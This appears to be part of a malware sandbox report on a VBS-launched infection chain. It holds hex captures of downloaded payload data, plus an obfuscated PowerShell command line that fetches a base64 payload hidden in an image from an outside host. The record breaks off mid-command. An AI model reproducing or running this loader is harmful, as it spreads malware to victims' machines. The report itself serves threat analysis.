2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df Data Ascii: \mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c Data Ascii: :T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rS
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 Data Ascii: W_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49732	116.206.104.215	443	6412	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 05:53:34 UTC	82	OUT	GET /error/xwapri.txt HTTP/1.1 Host: pantherropes.com Connection: Keep-Alive
2024-04-23 05:53:35 UTC	257	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:53:35 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 22 Apr 2024 14:24:49 GMT Accept-Ranges: bytes Content-Length: 46424 Vary: Accept-Encoding Content-Type: text/plain
2024-04-23 05:53:35 UTC	7935	IN	Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-23 05:53:35 UTC	8000	IN	Data Raw: 67 41 41 41 58 41 55 47 41 79 42 51 59 41 63 48 41 30 42 67 5a 41 38 47 41 54 4e 42 41 41 38 44 41 2f 41 77 50 48 41 41 41 6c 42 51 62 41 45 47 41 4f 42 77 63 41 4d 48 41 6c 42 77 59 41 38 47 41 79 42 41 55 58 41 41 41 6c 42 41 62 41 51 48 41 70 42 41 56 41 63 48 41 76 42 41 5a 41 34 47 41 70 42 77 56 41 34 47 41 70 42 51 59 41 30 30 48 41 45 41 41 41 4d 43 41 6a 41 77 49 41 41 53 43 41 41 41 49 41 41 43 41 6a 41 77 49 41 4d 79 43 41 41 51 58 41 34 45 41 50 42 41 49 41 6f 44 41 4c 42 77 51 41 38 45 41 4d 42 77 55 41 41 46 41 42 42 77 51 41 73 56 48 41 41 51 58 41 59 45 41 47 42 77 54 41 41 43 41 36 41 77 53 41 4d 45 41 50 42 41 54 41 4d 46 41 51 42 51 51 41 4d 45 41 62 39 42 41 41 77 47 41 68 42 41 64 41 6b 47 41 77 42 51 59 41 4d 30 44 41 41 51 58 41 49 Data Ascii: gAAAXAUGAyBQYAcHA0BgZA8GATNBAA8DA/AwPHAAAlBQbAEGAOBwcAMHAlBwYA8GAyBAUXAAAlBAbAQHApBAVAcHAvBAZA4GApBwVA4GApBQYA00HAEAAAMCAjAwIAASCAAAIAACAjAwIAMyCAAQXA4EAPBAIAoDALBwQA8EAMBwUAAFABBwQAsVHAAQXAYEAGBwTAACA6AwSAMEAPBATAMFAQBQQAMEAb9BAAwGAhBAdAkGAwBQYAM0DAAQXAI
2024-04-23 05:53:35 UTC	8000	IN	Data Raw: 59 4f 4a 58 5a 7a 56 31 58 30 56 32 5a 41 38 6d 5a 75 6c 6b 63 6c 52 58 64 77 31 32 62 44 42 41 64 6c 4e 46 41 6c 78 47 5a 75 46 47 53 30 6c 57 59 58 52 6e 62 6c 5a 58 52 41 4d 33 5a 68 78 6d 52 30 56 32 61 6a 39 32 55 41 51 33 59 6c 35 6d 62 76 4e 45 41 79 56 32 5a 6c 52 6e 62 4a 39 47 56 41 55 6d 65 70 4e 6c 63 6c 5a 6d 5a 31 4a 45 5a 75 56 32 55 66 52 58 5a 7a 42 51 5a 36 6c 32 55 79 56 6d 5a 6d 56 6e 51 6c 5a 58 61 6c 4e 57 5a 53 39 46 64 6c 4e 48 41 6c 52 58 65 43 42 51 5a 77 6c 48 56 73 39 32 59 76 52 33 62 79 42 46 41 6c 42 58 65 55 52 58 5a 72 4e 32 62 54 42 51 65 73 6c 57 62 68 5a 30 63 7a 56 6d 63 6b 52 57 51 41 73 32 59 68 4a 47 62 73 46 32 51 79 56 57 62 70 52 46 41 31 38 31 58 6b 45 47 5a 69 31 57 59 4d 39 46 41 77 45 47 41 30 38 31 58 6b 45 Data Ascii: YOJXZzV1X0V2ZA8mZulkclRXdw12bDBAdlNFAlxGZuFGS0lWYXRnblZXRAM3ZhxmR0V2aj92UAQ3Yl5mbvNEAyV2ZlRnbJ9GVAUmepNlclZmZ1JEZuV2UfRXZzBQZ6l2UyVmZmVnQlZXalNWZS9FdlNHAlRXeCBQZwlHVs92YvR3byBFAlBXeURXZrN2bTBQeslWbhZ0czVmckRWQAs2YhJGbsF2QyVWbpRFA181XkEGZi1WYM9FAwEGA081XkE
2024-04-23 05:53:35 UTC	8000	IN	Data Raw: 4e 41 6b 45 41 54 45 67 4e 42 45 47 42 41 30 67 42 42 6b 31 41 36 7a 67 39 41 6b 47 41 54 45 67 4e 41 6b 47 41 54 77 51 38 41 6b 46 41 54 77 77 36 41 6b 31 41 70 48 67 4e 41 6b 6c 41 43 45 67 4e 42 45 46 41 58 77 51 7a 42 45 30 41 59 7a 41 79 42 6b 30 41 69 7a 41 72 42 45 30 41 64 4c 51 54 42 6b 7a 41 59 4c 67 79 41 6b 46 41 54 45 67 4e 42 6b 69 41 55 47 67 4e 42 45 79 41 53 79 67 45 42 6b 52 41 72 7a 77 41 42 45 42 41 54 45 67 4e 42 6b 41 41 54 45 67 4e 42 45 77 41 48 47 67 4e 41 6b 50 41 51 4b 41 6d 41 51 30 41 4d 45 67 4e 41 45 50 41 54 45 67 4e 41 6b 68 41 38 76 51 61 41 6b 4f 41 78 4a 51 54 41 6b 68 41 73 76 51 54 41 6b 43 41 6f 4a 41 4e 41 6b 42 41 6a 4a 77 4b 41 6b 68 41 66 76 41 4c 41 6b 74 41 55 47 67 4e 41 45 4e 41 54 45 67 4e 41 6b 4d 41 54 45 Data Ascii: NAkEATEgNBEGBA0gBBk1A6zg9AkGATEgNAkGATwQ8AkFATww6Ak1ApHgNAklACEgNBEFAXwQzBE0AYzAyBk0AizArBE0AdLQTBkzAYLgyAkFATEgNBkiAUGgNBEyASygEBkRArzwABEBATEgNBkAATEgNBEwAHGgNAkPAQKAmAQ0AMEgNAEPATEgNAkhA8vQaAkOAxJQTAkhAsvQTAkCAoJANAkBAjJwKAkhAfvALAktAUGgNAENATEgNAkMATE
2024-04-23 05:53:35 UTC	8000	IN	Data Raw: 41 77 73 68 4b 47 51 62 4c 58 51 41 41 41 6f 43 67 48 51 41 41 41 73 43 67 4b 41 41 41 6c 68 69 42 41 41 77 55 6f 38 77 4b 45 41 41 41 70 41 6f 43 41 41 77 39 6f 6f 41 41 41 41 4b 4b 73 52 41 41 41 6f 69 66 45 41 41 41 70 38 48 48 78 63 41 42 41 41 67 4b 2b 74 67 42 41 41 77 55 6f 6f 41 41 41 45 43 4b 41 41 77 41 6f 44 53 53 72 45 42 41 41 38 43 41 41 41 41 55 41 49 41 4d 54 41 67 4b 47 41 77 4b 4b 59 42 42 72 59 77 4b 4b 63 72 43 41 41 67 39 6f 73 46 51 50 43 45 41 41 41 41 41 41 4d 43 62 45 41 41 41 6e 34 33 47 78 59 42 42 41 41 77 4a 2b 52 41 41 41 63 43 67 61 54 41 41 41 38 79 65 45 41 41 41 6f 38 6e 43 41 41 51 39 6f 55 42 4c 47 41 41 41 53 68 43 42 41 41 41 4b 2f 52 41 41 41 38 53 66 57 51 41 41 41 67 79 66 45 41 41 41 75 30 33 4b 41 41 41 42 6f 51 Data Ascii: AwshKGQbLXQAAAoCgHQAAAsCgKAAAlhiBAAwUo8wKEAAApAoCAAw9ooAAAAKKsRAAAoifEAAAp8HHxcABAAgK+tgBAAwUooAAAECKAAwAoDSSrEBAA8CAAAAUAIAMTAgKGAwKKYBBrYwKKcrCAAg9osFQPCEAAAAAAMCbEAAAn43GxYBBAAwJ+RAAAcCgaTAAA8yeEAAAo8nCAAQ9oUBLGAAAShCBAAAK/RAAA8SfWQAAAgyfEAAAu03KAAABoQ
2024-04-23 05:53:36 UTC	6489	IN	Data Raw: 4f 79 46 52 45 41 41 67 41 56 69 6a 42 41 41 67 49 6f 41 48 41 45 45 6a 63 50 4d 6a 46 4b 41 41 41 48 68 69 46 77 42 41 42 78 49 58 45 52 41 41 41 43 51 4c 4f 47 41 41 41 69 67 69 43 41 41 67 49 6f 6f 41 41 41 30 48 4b 47 41 41 41 63 68 69 43 41 41 51 66 6f 51 41 41 41 67 68 66 77 42 41 42 6c 49 48 4b 7a 59 68 43 41 41 77 52 6f 59 42 63 41 51 51 4a 79 46 52 45 41 41 67 41 73 6a 44 41 65 72 41 41 41 55 43 4b 47 4d 68 43 41 41 77 49 6f 55 79 44 65 72 41 41 41 6b 33 62 45 41 41 41 63 34 48 49 7a 59 68 43 41 41 77 52 6f 59 42 63 41 51 77 44 79 46 52 45 41 41 77 41 63 67 6a 43 41 41 41 66 76 70 35 46 47 51 41 41 41 77 68 66 45 41 41 41 63 41 6f 43 41 41 77 65 7a 70 41 41 41 6f 33 63 47 41 41 41 33 59 67 2f 55 41 67 33 4b 41 41 41 6c 67 53 42 54 6f 41 41 41 4d Data Ascii: OyFREAAgAVijBAAgIoAHAEEjcPMjFKAAAHhiFwBABxIXERAAACQLOGAAAigiCAAgIooAAA0HKGAAAchiCAAQfoQAAAghfwBABlIHKzYhCAAwRoYBcAQQJyFREAAgAsjDAerAAAUCKGMhCAAwIoUyDerAAAk3bEAAAc4HIzYhCAAwRoYBcAQwDyFREAAwAcgjCAAAfvp5FGQAAAwhfEAAAcAoCAAwezpAAAo3cGAAA3Yg/UAg3KAAAlgSBToAAAM

Target ID:	0
Start time:	07:53:21
Start date:	23/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
Imagebase:	0x7ff6f7700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	07:53:23
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHI